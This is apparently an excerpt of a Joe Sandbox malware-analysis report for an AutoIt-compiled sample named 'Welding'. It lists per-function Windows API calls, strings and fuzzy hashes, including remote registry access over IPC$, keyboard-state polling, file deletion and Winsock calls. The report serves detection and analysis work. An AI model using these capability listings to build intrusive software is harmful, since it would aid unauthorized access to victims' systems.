Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 2eeeb061d6ad3c860b0ef710d093bbc52309b1d05bd45534067888777faf5f04
Instruction ID: b74336f0abf9eac0dbbde1597d3d8d43594c1719cb09bfd336098fe0ccbc1b4d
Opcode Fuzzy Hash: 2eeeb061d6ad3c860b0ef710d093bbc52309b1d05bd45534067888777faf5f04
Instruction Fuzzy Hash: 8D519F71801109AACF19EBE0CD86EEEB779AF19340F500169F505B21A3EB316F99CB61

Function 00119710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0011951A: __time64.LIBCMT ref: 00119524

Part of subcall function 000C4A8C: _fseek.LIBCMT ref: 000C4AA4

__wsplitpath.LIBCMT ref: 001197EF

Part of subcall function 000D431E: __wsplitpath_helper.LIBCMT ref: 000D435E

_wcscpy.LIBCMT ref: 00119802
_wcscat.LIBCMT ref: 00119815
__wsplitpath.LIBCMT ref: 0011983A
_wcscat.LIBCMT ref: 00119850
_wcscat.LIBCMT ref: 00119863

Part of subcall function 00119560: _memmove.LIBCMT ref: 00119599
Part of subcall function 00119560: _memmove.LIBCMT ref: 001195A8

_wcscmp.LIBCMT ref: 001197AA

Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DE1
Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00119A0D
_wcsncpy.LIBCMT ref: 00119A80
DeleteFileW.KERNEL32(?,?), ref: 00119AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00119ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00119ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00119AEF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 98b63cbc629aef331efa21b13524a00c0e26f71ded62c5e1ee805baebc5237af
Instruction ID: 020244ddfee540bdd3db0f03bffdf0249f16b74cc6111bb928c8b78e5f6f7ed5
Opcode Fuzzy Hash: 98b63cbc629aef331efa21b13524a00c0e26f71ded62c5e1ee805baebc5237af
Instruction Fuzzy Hash: FBC13BB1900228ABDF15DF95CC95EDEB7BDEF59300F0040AAF609E7251EB709A848F65

Function 000C5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C5BF1
GetMenuItemCount.USER32(00177890), ref: 00100E7B
GetMenuItemCount.USER32(00177890), ref: 00100F2B
GetCursorPos.USER32(?), ref: 00100F6F
SetForegroundWindow.USER32(00000000), ref: 00100F78
TrackPopupMenuEx.USER32(00177890,00000000,?,00000000,00000000,00000000), ref: 00100F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00100F97

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: b025efb9a1eebceee1e941cfe917aa67ecff73e8b117073bec0e3f1bdf61d63d
Instruction ID: 9371ac9c07b6324d102084cd7904f4336f74e85cb1c487cba96866852e39c247
Opcode Fuzzy Hash: b025efb9a1eebceee1e941cfe917aa67ecff73e8b117073bec0e3f1bdf61d63d
Instruction Fuzzy Hash: 46711674644709BFEB228B55DC89FEEBF64FF08324F104216F6246A1E1C7B168A0DB90

Function 001083FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

_memset.LIBCMT ref: 00108489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001084BE
RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001084DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001084F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00108520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00108548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00108553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00108558

Strings

SOFTWARE\Classes\, xrefs: 0010842A
\IPC$, xrefs: 001084A0
\CLSID, xrefs: 00108440

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: f61412322a802ae72ddcd329d62313f65e379330545ce07bf7ed8563d9101592
Instruction ID: d53c7d1f9cadd1ef57f13de3382b03dbce0656141c82c827fd566d2edb3f2f70
Opcode Fuzzy Hash: f61412322a802ae72ddcd329d62313f65e379330545ce07bf7ed8563d9101592
Instruction Fuzzy Hash: C941F576C1422DABCB11EBA4DC95EEDB778FF09340F044129F945A32A2EB709E14CB90

Function 0013147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491

Strings

HKCU, xrefs: 00131581
HKEY_CLASSES_ROOT, xrefs: 00131524
HKLM, xrefs: 0013150F
HKEY_LOCAL_MACHINE, xrefs: 001314FA
HKU, xrefs: 001315A3
HKCC, xrefs: 0013155F
HKEY_USERS, xrefs: 00131592
HKCR, xrefs: 00131539
HKEY_CURRENT_CONFIG, xrefs: 0013154E
HKEY_CURRENT_USER, xrefs: 00131570

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: ad2cd366b047ad8fd4972f8ea794b0cc2353740fd1001a48a2696a1695affbb5
Instruction ID: 9ee2a2b3d23c8618bf3e1a6a2d126007c9df4a18d239e2f34dded2ae25daee3e
Opcode Fuzzy Hash: ad2cd366b047ad8fd4972f8ea794b0cc2353740fd1001a48a2696a1695affbb5
Instruction Fuzzy Hash: F941293450035AEBDF04EF90DD51AEA3725AF62304F604416FC9657292DB30ED2ACBA1

Function 00115882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

Part of subcall function 000C153B: _memmove.LIBCMT ref: 000C15C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000, alias PlayMe,00000022,?,00000022,open ), ref: 001158EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000,?,00000022,open ), ref: 00115901
mciSendStringW.WINMM(?,00000000,00000000,00000000,?,00000022,open ), ref: 00115912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000,?,00000022,open ), ref: 00115924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000,?,00000022,open ), ref: 00115935

Strings

play PlayMe, xrefs: 00115930
open , xrefs: 0011589A
alias PlayMe, xrefs: 001158C4
status PlayMe mode, xrefs: 001158E6
play PlayMe wait, xrefs: 0011591F
close PlayMe, xrefs: 001158FC, 00115929

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c7baf04bf3bed465fab48d95504c79235e5bb31e7c59694f72d49ec3e5d23c5a
Instruction ID: 8cb8f392da44d965fff10d969393a3c27832646d29f1976ca0167da3375b3d22
Opcode Fuzzy Hash: c7baf04bf3bed465fab48d95504c79235e5bb31e7c59694f72d49ec3e5d23c5a
Instruction Fuzzy Hash: 0A119031A4412DF9D724A7A1CC8AEFF7B7CFBD6B50F800429B811E21D2EB601994C5A1

Function 00114C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

#115.WSOCK32(00000101,?), ref: 00114C27
#57.WSOCK32(?,00000100), ref: 00114C41
#52.WSOCK32(?), ref: 00114C4E
_wcscpy.LIBCMT ref: 00114C76
_memmove.LIBCMT ref: 00114C89
#11.WSOCK32(?), ref: 00114C94
_strcat.LIBCMT ref: 00114CA2
_wcscpy.LIBCMT ref: 00114CB9
#116.WSOCK32 ref: 00114CC7
_wcscpy.LIBCMT ref: 00114CD5

Strings

0.0.0.0, xrefs: 00114C70

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _wcscpy$#115#116_memmove_strcat
String ID: 0.0.0.0
API String ID: 1745391200-3771769585
Opcode ID: f1279fb1a86a837d30bdd99354a4fb7d6cb6dbed168acca49b8390f6f5b3d282
Instruction ID: 901fa6a0d0f0b77331c902e8dd15980a3211402187b44a780da44333268dba8c
Opcode Fuzzy Hash: f1279fb1a86a837d30bdd99354a4fb7d6cb6dbed168acca49b8390f6f5b3d282
Instruction Fuzzy Hash: 37113A31904209ABCB19B7609D4AEDA77BCDF45B10F000176F544962A2EF7099C1CAB0

Function 000B33E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 000B3444
RegisterClassExW.USER32(00000030), ref: 000B346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
InitCommonControlsEx.COMCTL32(?), ref: 000B349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
LoadIconW.USER32(000000A9), ref: 000B34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1

Strings

AutoIt v3 GUI, xrefs: 000B3460
0, xrefs: 000B3426
+, xrefs: 000B342D
TaskbarCreated, xrefs: 000B3474

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: e7f70ed0ec654e4efdcf624bf66c8a24d6b459de306ad687279ee6f7f425e6dc
Instruction ID: 7a980efae206888d325cfcd525d49b11b8a92c04a10c18575955d05e4cead983
Opcode Fuzzy Hash: e7f70ed0ec654e4efdcf624bf66c8a24d6b459de306ad687279ee6f7f425e6dc
Instruction Fuzzy Hash: F33125B1844309AFDB528FA4DC89AC9BBF0FF0A310F10455AE694E66A0D3B915C1CF92

Function 00115530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00115535

Part of subcall function 000D083E: timeGetTime.WINMM(?,00000002,000BC22C), ref: 000D0842

Sleep.KERNEL32(0000000A), ref: 00115561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00115585
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 001155A7
SetActiveWindow.USER32 ref: 001155C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001155D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 001155F3
Sleep.KERNEL32(000000FA), ref: 001155FE
IsWindow.USER32 ref: 0011560A
EndDialog.USER32(00000000), ref: 0011561B

Strings

BUTTON, xrefs: 00115599

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 37962d6b43f8d497f334fdc9166bc2d2c8c91439365c304e1dd457cce7ce76de
Instruction ID: 50383b64441cd30fd2acb7b934a69d40f0b0f2f4300b5879c8308d561687fc0c
Opcode Fuzzy Hash: 37962d6b43f8d497f334fdc9166bc2d2c8c91439365c304e1dd457cce7ce76de
Instruction Fuzzy Hash: 6A21D478248604EFE7455B61EC88A653B7BEB89785F001038F509819B1EF718DD0DA71

Function 000B3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 000B3444
RegisterClassExW.USER32(00000030), ref: 000B346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
InitCommonControlsEx.COMCTL32(?), ref: 000B349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
LoadIconW.USER32(000000A9), ref: 000B34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1

Strings

AutoIt v3 GUI, xrefs: 000B3460
0, xrefs: 000B3426
+, xrefs: 000B342D
TaskbarCreated, xrefs: 000B3474

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 19e24c0f15a5f894a80235bd2a46895a05fe8b459f23f5b47dd88a56f128c286
Instruction ID: b5e7e8386d21bc557ad486613bd5dc8f2986011b62d2b6122d5fe3866320c3cc
Opcode Fuzzy Hash: 19e24c0f15a5f894a80235bd2a46895a05fe8b459f23f5b47dd88a56f128c286
Instruction Fuzzy Hash: 0C21E4B5954308AFDB01DFA5EC89BDDBBF4FB09701F10411AFA14A66A0D7B11580CF92

Function 0011DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

CoInitialize.OLE32(00000000), ref: 0011DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0011DCC0
SHGetDesktopFolder.SHELL32(?), ref: 0011DCD4
CoCreateInstance.OLE32(00143D4C,00000000,00000001,0016B86C,?), ref: 0011DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0011DD8F
CoTaskMemFree.OLE32(?,?), ref: 0011DDE7
_memset.LIBCMT ref: 0011DE24
SHBrowseForFolderW.SHELL32(?), ref: 0011DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0011DE83
CoTaskMemFree.OLE32(00000000), ref: 0011DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0011DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 0011DEC3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 6dc29bee3c89ac31f49e450ef172920c37c4f3c2e1b59690e9dd08f609f11300
Instruction ID: 0939ef7a7b6d8f75942a00d81f5e8d957323812efe714933651168f3c1f79e7a
Opcode Fuzzy Hash: 6dc29bee3c89ac31f49e450ef172920c37c4f3c2e1b59690e9dd08f609f11300
Instruction Fuzzy Hash: 4CB1ED75A00119AFDB04DFA4D884DEEBBB9FF49305B148469F905EB261DB30EE85CB50

Function 0011081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00110896
SetKeyboardState.USER32(?), ref: 00110901
GetAsyncKeyState.USER32(000000A0), ref: 00110921
GetKeyState.USER32(000000A0), ref: 00110938
GetAsyncKeyState.USER32(000000A1), ref: 00110967
GetKeyState.USER32(000000A1), ref: 00110978
GetAsyncKeyState.USER32(00000011), ref: 001109A4
GetKeyState.USER32(00000011), ref: 001109B2
GetAsyncKeyState.USER32(00000012), ref: 001109DB
GetKeyState.USER32(00000012), ref: 001109E9
GetAsyncKeyState.USER32(0000005B), ref: 00110A12
GetKeyState.USER32(0000005B), ref: 00110A20

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b1915c1044ad64f4968eab320f402342beff363356a722271eaffa115f978d12
Instruction ID: 4278b68db7efd26f6c169cbfb54910e09f8be049262e888332c5d8ed6097073c
Opcode Fuzzy Hash: b1915c1044ad64f4968eab320f402342beff363356a722271eaffa115f978d12
Instruction Fuzzy Hash: 1C51CA20E0878829FB3ADBA048107EAFFB49F15384F0845AD95C65B5C3DBE49ACCC791

Function 0010CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0010CE1C
GetWindowRect.USER32(00000000,?), ref: 0010CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0010CE8C
GetDlgItem.USER32(?,00000002), ref: 0010CE97
GetWindowRect.USER32(00000000,?), ref: 0010CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0010CEFD
GetDlgItem.USER32(?,000003E9), ref: 0010CF0B
GetWindowRect.USER32(00000000,?), ref: 0010CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0010CF5F
GetDlgItem.USER32(?,000003EA), ref: 0010CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0010CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 0010CF97

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f5a5eeb8794f18a7eba37a18243e35388ccdf99e61e70b84ce17b76e22d46b17
Instruction ID: f702824854890cc069205ad5f06d5881e63ebb7187edb1855e90f9b81d9cbd7d
Opcode Fuzzy Hash: f5a5eeb8794f18a7eba37a18243e35388ccdf99e61e70b84ce17b76e22d46b17
Instruction Fuzzy Hash: 41516375B00205AFDF18CF69CD85AAEBBB6EB88711F14822DF616D72D0D7B0AD408B50

Function 000B23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B2412,?,00000000,?,?,?,?,000B1AA7,00000000,?), ref: 000B1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000B24AF
KillTimer.USER32(?,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000B254A
DestroyAcceleratorTable.USER32(00000000), ref: 000EBFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC04B
DeleteObject.GDI32(00000000), ref: 000EC05D

Memory Dump Source

